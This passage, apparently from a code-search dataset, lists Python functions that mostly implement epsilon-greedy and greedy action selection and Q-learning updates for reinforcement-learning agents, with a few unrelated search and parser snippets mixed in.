self.feasible_actions_in_state(s):\n\t\t\tq_value = q[action]\n\t\t\tif q_value == max_val:\n\t\t\t\tresult.append(action)\n\t\t\telif q_value > max_val:\n\t\t\t\tresult = [action]\n\t\t\t\tmax_val = q_value\n\t\treturn result", "def greedy(self, state, timestep, epsilon=0):\n\n counts = np.bincount(self.call_locs, minlength=self.num_nodes)\n # print(self.lengths)\n # print(counts)\n score = self.lengths @ counts\n action = []\n for _ in range(self.num_ambulance):\n node = np.argmin(score)\n action.append(node)\n score[node] = 99999999\n return action", "def greedy_eps(self, Q):\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a", "def eps_greedy_policy(q_values, eps, forbidden_actions):\r\n\r\n q_values[forbidden_actions] = np.NINF\r\n indices = torch.nonzero(q_values == q_values.max())\r\n random_index = random.randint(0, indices.shape[1]-1)\r\n best_action_index = indices[random_index]\r\n l = len(q_values)\r\n n_forbidden_actions = np.count_nonzero(forbidden_actions)\r\n p = eps / (l-n_forbidden_actions)\r\n\r\n policy = np.full([l], p)\r\n policy[forbidden_actions] = 0\r\n policy[best_action_index] += 1 - eps\r\n\r\n return policy", "def get_greedy_action(Q, obs):\n obs = Q.xp.asarray(obs[None], 
dtype=np.float32)\n with chainer.no_backprop_mode():\n q = Q(obs).data[0]\n return int(q.argmax())", "def epsilon_greedy_move(self):\n\n # get the current state\n state, _ = self.board.bit_board_representation()\n \n # choose the move to play\n is_exploring_move = False\n if random.random() < self.epsilon:\n # exploration\n action = self.board.random_move()\n is_exploring_move = True\n else:\n # exploitation\n action, _ = self.board.greedy_action_move(self.target_network)\n\n action_index = action\n if self.board.player == CONST.BLACK:\n action_index = action + 9\n \n # play the epsilon greedy move\n self.board.play_move(action)\n \n # add the experience to the experience buffer if the move was not an exploration move\n if not is_exploring_move:\n reward = self.board.reward()\n not_terminal = self.board.not_terminal_int()\n succ_state, succ_player = self.board.bit_board_representation()\n succ_legal_moves = self.board.legal_moves\n self.experience_buffer.add(state, action_index, reward, not_terminal, succ_state, succ_player, succ_legal_moves)", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def EpsGreedy(self, actions, game_state):\n if random.random() < self.epsilon:\n return random.choice(actions)\n else:\n return self.best_action(actions, game_state)", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, 
observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n print(f'q_values: {q_values}')\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def epsilon_greedily_update_policy(self, current_Q, iterations_completed):\n iteration = iterations_completed+1\n # epsilon = min(1/np.log(iterations_completed+.0001),1)\n # epsilon = 1/iteration\n epsilon = 0.1\n def new_policy(state):\n heads = True if random.random() < epsilon else False # Flip our epsilon greedy coin\n if heads: # If heads comes up, choose random action\n return random.randint(0, self.nA-1)\n else: # If tails comes up, choose greedy option\n return np.argmax(current_Q[state]['Q(s,a)'])\n return new_policy", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\r\n def policy_fn(observation):\r\n A = np.ones(nA, dtype=float) * epsilon / nA\r\n q_values = estimator.predict(observation)\r\n best_action = np.argmax(q_values)\r\n A[best_action] += (1.0 - epsilon)\r\n return A\r\n return policy_fn", "def takeAction(self, state):\n # go greedy or not?\n if random.uniform(0, 1) < self.epsilon:\n # greedy selection\n # find best action\n allActions = torch.stack(\n tuple(torch.cat((state.strengths, state.focus, changes)) for changes in self.actionSet))\n evaluation = self.q.evaluateBunch(allActions)\n action = Action(state, self.actionSet[evaluation.argmax()])\n return action\n else:\n # random selection\n return Action(state, random.choice(self.actionSet))", "def greedy():\n return constant(0)", "def q_greedify_policy(env, V, pi, s, gamma):\n ### START CODE HERE ###\n ##q(s,a)=sigma(P(ss')*(gamma*V(s')+R(s,a,s'))\n q = np.zeros((env.action_space.n))\n for idx, action in enumerate(range(env.action_space.n)):\n for prob_next_state, next_state, reward_next_state, done in env.P[s][action]:\n q[idx] += prob_next_state * ((gamma * V[next_state]) + reward_next_state)\n\n greedy_action = np.argmax(q)\n # print(greedy_action)\n for action, action_prob in enumerate(pi[s]):\n if action == greedy_action:\n print(action, greedy_action)\n pi[s][action] = 1\n else:\n pi[s][action] = 0", "def choose_action(self, state, epsilon_greedy=False):\n chosen_action = None\n if epsilon_greedy:\n if np.random.rand() <= self.epsilon:\n print('random actions')\n\n # choose random action\n chosen_action = random.choice(self.actions)\n\n else:\n print('argmax')\n\n # find the action with greatest Q value\n maxQ = -float(\"inf\")\n for action in self.actions:\n input_data = np.asarray(state + action).reshape(self.OUTPUT_DIM, self.INPUT_DIM)\n Q = self.model.predict(input_data)\n if Q > maxQ:\n maxQ = Q\n chosen_action = action\n\n else:\n\n # policy rollout\n maxQ = -float(\"inf\")\n for action in self.actions:\n input_data = np.asarray(state + action).reshape(self.OUTPUT_DIM, self.INPUT_DIM)\n Q = self.model.predict(input_data)\n if Q > maxQ:\n maxQ = Q\n chosen_action = action\n\n return chosen_action", "def __act__(\n self,\n t: int\n ) -> Action:\n\n if self.random_state.random_sample() < self.epsilon:\n a = self.random_state.choice(self.most_recent_state.AA)\n self.epsilon *= (1 - self.epsilon_reduction_rate)\n else:\n a = self.greedy_action\n\n 
return a", "def epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon):\n\n new_policy = epsilon * np.ones((nS, nA)) / nA # = epsilon / m, where m is the number of Actions, nA\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: IF TWO ACTIONS HAVE THE SAME MAXIMUM Q VALUE, THEY MUST BOTH BE EXECUTED EQUALLY LIKELY.\n # THIS IS IMPORTANT FOR EXPLORATION. This might prove useful:\n # https://stackoverflow.com/questions/17568612/how-to-make-numpy-argmax-return-all-occurrences-of-the-maximum\n \n # print(\"new_policy = {0}\".format(new_policy))\n \n for s_t in range (0, nS):\n # print(\"old_policy[{0}] = {1}\".format(s_t, new_policy[s_t]))\n # print(\"Q_value[{0}] = {1}\".format(s_t, Q_value[s_t]))\n Q_list = np.argwhere(Q_value[s_t] == np.amax(Q_value[s_t])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n # print(\"Q_list: \" + str(Q_list))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n # print(\"max_Q: \" + str(max_Q))\n \n # A_star = new_policy[s_t][max_Q]\n # print(\"A_star: \" + str(A_star))\n \n new_policy[s_t][max_Q] += 1 - epsilon # for the chosen maximal index of Q, set the polocy to epsilon/m + 1 - epsilon\n # print(\"new_policy[{0}] = {1}\".format(s_t, new_policy[s_t]))\n \n # for a_t in range (0, nA):\n # if a_t in Q_list:\n # new_policy[s_t][a_t] += (1 - epsilon) / len(Q_list)\n\n ############################\n # print(\"new_policy = {0}\".format(new_policy))\n return new_policy", "def select_action(self, state: np.ndarray) -> np.ndarray:\n # epsilon greedy policy\n # pylint: disable=comparison-with-callable\n if self.epsilon > np.random.random():\n selected_action = np.array(self.env.action_space.sample())\n else:\n with torch.no_grad():\n state = self._preprocess_state(state, self.device)\n selected_action = self.dqn(state).argmax()\n selected_action = selected_action.cpu().numpy()\n\n # Decay epsilon\n self.epsilon = max(\n self.epsilon\n - (self.max_epsilon - self.min_epsilon) * self.hyper_params.epsilon_decay,\n self.min_epsilon,\n )\n\n return selected_action", "def select_action(self, q_values, is_training):\n # if is_training then do epsilon decay,\n # otherwise use constant epsilon = 0.05\n if is_training:\n if self.epsilon > self.end:\n self.epsilon -= self.decay_stepsize\n else:\n self.epsilon = 0\n return super(LinearDecayGreedyEpsilonPolicy, self).select_action(q_values)", "def epsilon_greedy_probs(self, nA, Q_s, i_count, eps=None):\r\n epsilon = 1.0 / i_count\r\n if eps is not None:\r\n epsilon = eps\r\n \r\n policy_s = np.ones(nA) * epsilon / nA\r\n policy_s[np.argmax(Q_s)] = 1 - epsilon + (epsilon / nA)\r\n return policy_s", "def update_q_table(self, cur_state, action, reward, next_state):\n new_max_q = max(self.q_val_table[next_state])\n new_value = reward + self.gamma * new_max_q\n\n old_value = self.q_val_table[cur_state][action]\n self.q_val_table[cur_state][action] = old_value + self.alpha * (new_value - old_value)\n\n # Decay epsilon_greedy\n self.e_greedy_prob = self.exp_decay(self.e_greedy_prob)", "def select_action(engine, observation):\n with torch.no_grad():\n dqn.eval()\n if torch.rand(1).item() < epsilon:\n return random_action(observation)\n else:\n return dqn(observation).greedy()", "def epsilon_greedy_policy(network, eps_end, eps_start, eps_decay, actions, device):\n def policy_fn(observation, steps_done):\n sample = np.random.random()\n eps_threshold = eps_end + (eps_start - eps_end) * math.exp(-1. 
* steps_done * eps_decay)\n if sample > eps_threshold:\n with torch.no_grad():\n if observation.dim() == 3:\n observation = observation.unsqueeze(0)\n elif observation.dim() < 3:\n NotImplementedError(\"Wrong input dim\")\n\n values = network.forward(observation.to(device))[0]\n best_action = torch.max(values, dim=0)[1]\n return best_action.cpu().item(), eps_threshold\n else:\n # return torch.tensor(np.random.randint(low=0, high=num_actions), dtype=torch.long), eps_threshold\n return random.choice(actions), eps_threshold\n return policy_fn", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy_next_action(self, state):\n max_val = float('-inf')\n if self.verbose:\n cells = []\n max_candidates = {}\n for i in range(3):\n for j in range(3):\n if state[i][j] == VALUES.EMPTY:\n val = self.q_value((state, (i, j)))\n if val >= max_val:\n max_val = val\n max_move = (i, j)\n max_candidates[max_move] = val\n if self.verbose:\n cells.append('{0:.3f}'.format(val).center(6))\n elif self.verbose:\n cells.append(state[i][j].center(6))\n if self.verbose:\n self.logger.info(BOARD.format(*cells))\n possible_actions = [k for k, v in max_candidates.items() if v == max_val]\n action = random.choice(possible_actions) if len(possible_actions) > 0 else None\n return action", "def qlearning(alpha, gamma, epsilon, episodes, max_steps, n_tests, render = False, test=False):\n env = gym.make('Taxi-v2')\n n_states, n_actions = env.observation_space.n, env.action_space.n\n Q = init_q(n_states, n_actions, type=\"ones\")\n timestep_reward = []\n for episode in range(episodes):\n print(f\"Episode: {episode}\")\n s = env.reset()\n a = epsilon_greedy(Q, epsilon, n_actions, s)\n t = 0\n total_reward = 0\n done = False\n while t < max_steps:\n if render:\n env.render()\n t += 1\n s_, reward, done, info = env.step(a)\n total_reward += reward\n a_ = np.argmax(Q[s_, :])\n if done:\n Q[s, a] += alpha * ( reward - Q[s, a] )\n else:\n Q[s, a] += alpha * ( reward + (gamma * Q[s_, a_]) - Q[s, a] )\n s, a = s_, a_\n if done:\n if render:\n print(f\"This episode took {t} timesteps and reward: {total_reward}\")\n timestep_reward.append(total_reward)\n break\n if render:\n print(f\"Here are the Q values:\\n{Q}\\nTesting now:\")\n if test:\n test_agent(Q, env, n_tests, n_actions)\n return timestep_reward", "def epsilon_greedy_agent(bandit, iterations, epsilon = 0.2, initial_rounds = 1):\n\n pay_offs = dict()\n\n for i in range(iterations):\n # sometimes randomly pick an action to explore\n if random.random() < epsilon or i < initial_rounds:\n a = random.choice(bandit.actions)\n # otherwise pick the best one thus far\n else:\n # check for the lever with the best average payoff\n new_dict = {}\n for key,val in pay_offs.items():\n new_dict[key] = np.mean(val) \n a = max(new_dict, key=new_dict.get)\n\n r = bandit.sample(a)\n\n #update rewards\n if a in pay_offs:\n pay_offs[a].append(r)\n else:\n pay_offs[a] = [r]\n \n yield a, r", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 
0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def reset_for_new_run(\n self,\n state: State\n ):\n\n super().reset_for_new_run(state)\n\n self.epsilon = self.original_epsilon\n self.greedy_action = list(self.Q.keys())[0]", "def tabular_one_step_q(env, policy, state, Q, alpha=0.5, discount_factor=1.0):\n\n # choose A from S using policy derived from Q (epsilon-greedy)\n action = policy(state)\n\n # take action, observe R, S'\n (next_state, reward, done, probability) = env.step(int(action))\n\n # get max action-value\n max_action_value = max([Q[next_state][a] for a in range(env.action_space.n)])\n\n # update Q\n Q[state][action] = Q[state][action] + alpha * (\n reward + discount_factor * max_action_value - Q[state][action]\n )\n\n # copy state_tilde and action_tilde to be next steps.\n state = next_state\n\n return action, state, reward, done", "def calcQ(self,thisObs,next_action,reward):\n \n thisObs_tup=(thisObs['volume'],thisObs['time'])\n lastAction_tup=(self.lastAction['vol'],self.lastAction['price'])\n lastObs_tup=(self.lastObs['volume'],self.lastObs['time'])\n lastQvalue=0\n maxQvalue=0\n temp_action=()\n \n if (len(self.Qvalue)>0): \n \"\"\"Searches the Q-value dictionary\"\"\"\n for key,value in self.Qvalue.iteritems():\n \n if (key[0][0]== thisObs_tup[0] and key[0][1]==thisObs_tup[1]):\n if (value > maxQvalue):\n maxQvalue=value\n temp_action = key[1]\n \n if (key[0][0]== lastObs_tup[0] and key[0][1]==lastObs_tup[1] and \n key[1][0]== lastAction_tup[0] and key[1][1]==lastAction_tup[1]):\n \n lastQvalue=self.Qvalue[key]\n #print(\"This state was already encoutered and updated\")\n \n self.Qvalue[(lastObs_tup,lastAction_tup)]=lastQvalue+alpha*(reward+(gamma*maxQvalue)-lastQvalue) \n #print 'The Qtable is',self.Qvalue\n if (len(temp_action)!=0):\n #print \"I found a greedy action\" \n next_action['vol'] = temp_action[0]\n next_action['price']=temp_action[1]\n else: \n next_action=self.return_random_action(thisObs)\n \n return next_action", "def test_greedy_strategy():\n tiles = Tiles(800, 100)\n board = Board(800, 100, tiles)\n player = Player('Alfred', board, 'black')\n ai = AI(board, player)\n for i in range(board.count//2 + 1, board.count - 1):\n board.add_tile(i, board.count//2 - 1, 'black')\n assert ai.greedy_strategy()[0] == (board.count - 1, board.count//2 - 1)\n assert len(ai.greedy_strategy()[1]) == board.count//2 - 1\n board.add_tile(board.count//2 - 1, 0, 'white')\n for i in range(1, board.count - 1):\n if board.tiles_list[board.count//2 - 1][i] is None:\n board.add_tile(board.count//2 - 1, i, 'black')\n else:\n board.tiles_list[board.count//2 - 1][i].color = 'black'\n assert ai.greedy_strategy()[0] == (board.count//2 - 1, board.count - 1)\n assert len(ai.greedy_strategy()[1]) == board.count - 2", "def choose_action(Q_table, state, 
epsilon):\n if random.uniform(0, 1) < epsilon:\n return random.choice(ACTIONS)\n else:\n actions = Q_table.get(state.__str__())\n if actions is None:\n return random.choice(ACTIONS)\n else:\n return PlayerAction(np.argmax(actions))", "def test_greedy_one_or_more():\n grammar = r\"\"\"\n S: A+ A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 6\n\n # But greedy variant has only one solution where first A+! collects all tokens.\n grammar = r\"\"\"\n S: A+! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def greedy(self) -> torch.Tensor:\n return self.with_batch_dim(self.q_values).argmax(1).squeeze()", "def greedy(self):\n n_step_t = self.filter['n_step_t']\n n_traj = self.filter['n_traj']\n traj = self.filter['traj']\n steps = [0 for i in xrange(n_step_t)]\n for i in xrange(n_traj):\n n_step = traj[i]['n_step']\n for j in xrange(n_step):\n steps[j] += 1\n self.filter['steps'] = steps\n \n return", "def epsilon_greedy(deques: List[deque],\n model: BetaBernoulli,\n mode: str,\n topk: int = 1,\n epsilon: float = 0.1,\n **kwargs) -> Union[int, List[int]]:\n if random.random() < epsilon:\n return random_sampling(deques, topk)\n else:\n samples = model.eval\n if mode == 'max':\n ranked = np.argsort(samples)[::-1]\n elif mode == 'min':\n ranked = np.argsort(samples)\n\n if topk == 1:\n for j in range(len(deques)):\n category = ranked[j]\n if len(deques[category]) != 0:\n return category\n else:\n categories_list = []\n candidates = set([i for i in range(len(deques)) if len(deques[i]) > 0])\n # when we go through 'ranked' and len(categories_list) < topk, topk sampling is reduced to top 1\n if len(candidates) < topk:\n return epsilon_greedy(deques, model, mode, topk=1)\n else:\n for category in ranked:\n if category in candidates:\n categories_list.append(category)\n if len(categories_list) == topk:\n return categories_list", "def select_action(self, state, epsilon=None):\n if epsilon == None:\n epsilon = self.epsilon\n \n if np.random.random() > epsilon:\n # greedy action selection\n return self.get_optimal_action(state)\n \n else:\n # random action selection\n return np.random.randint(0, self.num_actions)", "def greedy_policy(self):\n return defaultdict(lambda: 0)", "def e_greedy_sampling(self, k_array, reward_array, number_slots):\n\n # successes and total draws\n success_count = reward_array.sum(axis=1)\n total_count = k_array.sum(axis=1)\n\n # ratio of successes vs total\n success_ratio = success_count / total_count\n\n # choosing best greedy action or random depending with epsilon probability\n if np.random.random() < self.epsilon:\n\n # returning random action, excluding best\n return np.random.choice(np.delete(list(range(number_slots)), np.argmax(success_ratio)))\n\n # else return best\n else:\n\n # returning best greedy action\n return np.argmax(success_ratio)", "def qlearning(env, iterations=1000, gamma=0.9, alpha=0.1):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n policy = np.ones((env.nS,env.nA))/env.nA\n epsilon = 1\n s_t1 = env.reset() # reset the environment and place the agent in the start square\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n curr_state = s_t1\n \n start = time.time() # to time how long convergence takes\n print(\"---Q 
Learning---\\nTraining Started.\")\n \n for k in range (1, iterations):\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n epsilon = 1/k\n curr_action, reward, new_state, done = take_one_step(env, policy, curr_state)\n new_action = sample_action(policy, new_state)\n Q_value[curr_state, curr_action] = Q_value[curr_state, curr_action] + alpha * (reward + gamma * (Q_value[new_state, np.argmax(Q_value[new_state])]) - Q_value[curr_state, curr_action])\n \n # epsilon-greedy policy update\n Q_list = np.argwhere(Q_value[curr_state] == np.amax(Q_value[curr_state])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n for a in range (nA):\n if a == max_Q:\n policy[curr_state][a] = epsilon/nA + (1 - epsilon) # for the chosen maximal index of Q, set the policy to epsilon/m + 1 - epsilon\n else:\n policy[curr_state][a] = epsilon/nA \n \n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"policy = {0}\".format(policy))\n \n if done:\n curr_state = env.reset() # reset the environment and place the agent in the start square\n curr_action = sample_action(policy, curr_state)\n else:\n curr_state = new_state\n curr_action = new_action\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n \n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def get_epsilon_action(epsilon, env, mean_reward_per_bandit):\n explore = np.random.uniform() < epsilon\n\n if explore:\n return env.action_space.sample()\n else:\n return np.argmax(mean_reward_per_bandit)", "def aStarSearch(problem, heuristic=nullHeuristic):\n\n frontier = util.PriorityQueue()\n #print 'Create frontier'\n initial_state = problem.getStartState()\n initial_node = node2(initial_state, 0, [], 0 , evaluationFunction(problem, 0, heuristic, initial_state))#(state,depth,path_actions,path_cost,f)\n\n frontier.push(initial_node, initial_node.f)\n #print 'Push ',repr((initial_node.state, initial_node.f))\n frontierSet = set([(initial_node.state, initial_node.f)])\n explored = set() #initialize the explored set to be empty\n\n while True:\n if frontier.isEmpty() == True: raise Exception, \"The frontier was emptied\"#if the frontier is empty then return failure\n currNode = frontier.pop()#HERE1\n frontierSet.remove((currNode.state, currNode.f))\n #print 'Remove',repr((currNode.state, currNode.f))\n #print 'State: ' + repr(currNode.state) + '. Depth: ' + repr(currNode.depth) + '. Path Cost: ' + repr(currNode.path_cost) + '. EvalFunc: ' + repr(currNode.f) + '. Path Actions: ' + repr(currNode.path_actions) + '.\\n'\n if problem.isGoalState(currNode.state) == True:\n print 'Goal reached!'\n return currNode.path_actions\n explored.add(currNode.state)\n for succ in problem.getSuccessors(currNode.state):\n succState = succ[0]\n succAction = succ[1]\n succActionCost = succ[2]\n\n #print 'Succ: ',repr((succState, succAction, succActionCost))\n succEvalFunc = evaluationFunction(problem, currNode.path_cost + succActionCost, heuristic, succState)\n #print 'State: %s. Heuristic : %s. h = %s. g = %s. 
f = %s' % (succState, repr(heuristic), heuristic(succState, problem), currNode.path_cost + succActionCost , succEvalFunc)\n succNode = node2(succState, currNode.depth + 1, currNode.path_actions + [succAction,], currNode.path_cost + succActionCost, succEvalFunc)\n if (succNode.state not in explored):\n \"\"\"Aca si hay que verificar si es que ya esta en la frontera porque es formato FIFO.\n Entonces los nodos que estan en la lista necesariamente van a ser\n verificados antes de que se vuelva a insertar otro, cumpliendo con el algoritmo.\n \"\"\"\n\n StateInFrontierSet = False\n ExistsBetterPriority = False\n for frontierSet_node in frontierSet:\n if (succNode.state == frontierSet_node[0]):\n StateInFrontierSet = True\n if (succNode.f < frontierSet_node[1]):\n ExistsBetterPriority = True\n frontierSet.remove(frontierSet_node)\n #print 'Remove ',repr((frontierSet_node[0], frontierSet_node[1]))\n\n #Recurso'i:\n for prio, count, frontierNode in frontier.heap:\n if frontierNode.state == succNode.state:\n frontier.heap.remove((prio, count, frontierNode))\n \"\"\"\n Recurso'i. Hay que cambiar la estructura de los nodos para que contenga solo el action_cost, en lugar del path_cost\n y para guardar la solucion tener una estructura aparte a la que se le van appendeando las acciones,\n o capaz seguir la implementacion del libro y hacer una funcion con el nodo como parametro y calcula la solucion,\n o hacer que frontier solo tenga los estados?\n frontier.update(succNode, succNode.path_cost) con esta operacion deberia de bastar\n \"\"\"\n break\n\n if not (StateInFrontierSet and not ExistsBetterPriority): # El caso en que no se hace nada es cuando ya esta en la frontera\n # pero con una mejor o igual prioridad\n frontier.push(succNode, succNode.f)\n #print 'Push ',repr((succNode.state, succNode.f))\n frontierSet.add((succNode.state, succNode.f))", "def select_action(self, state):\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[state], self.count, self.epsilon)\r\n return np.random.choice(np.arange(self.nA), p=policy_s)", "def step(self, state, action, reward, next_state, done):\r\n self.count = self.count + 1\r\n \r\n if done:\r\n self.Q[state][action] = self.update_Q(self.Q[state][action], 0, reward, self.alpha, self.gamma)\r\n self.count = 1\r\n return\r\n\r\n next_action = self.select_action(next_state)\r\n #self.Q[state][action] = self.update_Q(self.Q[state][action], self.Q[next_state][next_action], \r\n # reward, self.alpha, self.gamma)\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[next_state], self.count, self.epsilon)\r\n self.Q[state][action] = self.update_Q(self.Q[state][action], np.dot(self.Q[next_state], policy_s), \r\n reward, self.alpha, self.gamma)", "def q_learning(env, learning, discount, epsilon, min_eps, episodes):\n # [18.00000072 14.00000006]\n num_states = (env.observation_space.high - env.observation_space.low) * \\\n np.array([10, 100]) # >> [18.00000072 14.00000006]\n num_states = np.round(num_states, 0).astype(int) + 1 # >> [19 15]\n\n # Initialize Q table\n # env.action_space.n return the number of action that our agent can make (here 3, left, cease, right)\n Q = np.random.uniform(low=-1, high=1, size=(num_states[0], num_states[1], env.action_space.n))\n\n # Initialize variable to track rewards\n reward_list = []\n ave_reward_list = []\n\n # Calculate episodic reduction in epsilon\n reduction = (epsilon - min_eps) / (episodes / 2)\n\n for i in range(episodes):\n # Initialize parameters\n done = False\n tot_reward, reward = 0, 0\n state = env.reset()\n\n # 
Discretize state\n state_adj = adjust_state(state)\n\n while done != True:\n # Render env for last five eps\n if i >= (episodes - 20):\n env.render()\n\n # Determine next action - epsilon greedy strategy\n if np.random.random() < 1 - epsilon:\n action = np.argmax(Q[state_adj[0], state_adj[1]])\n else:\n action = np.random.randint(0, env.action_space.n)\n\n # Get next state and reward\n state2, reward, done, info = env.step(action)\n\n # Discretize state2\n state2_adj = adjust_state(state2)\n\n # Allow for terminal states // .5 on env_space[0] represent the flag position\n if done and state2[0] >= .5:\n Q[state_adj[0], state_adj[1], action] = reward\n\n # adjust Q value for current state\n else:\n '''work on this, it's complicated but far from non-understandable'''\n delta = learning*(reward + discount*np.max(Q[state2_adj[0], state2_adj[1]]) -\n Q[state_adj[0], state_adj[1], action])\n Q[state_adj[0], state_adj[1], action] += delta\n\n tot_reward += reward\n state_adj = state2_adj\n\n # Decay epsilon\n if epsilon > min_eps:\n epsilon -= reduction\n\n # Track rewards\n reward_list.append(tot_reward)\n\n if (i+1) % 100 == 0:\n ave_reward = np.mean(reward_list)\n ave_reward_list.append(ave_reward)\n reward_list = []\n print(f'Episode {i+1} Average Reward: {ave_reward}')\n\n env.close()\n\n return ave_reward_list", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n 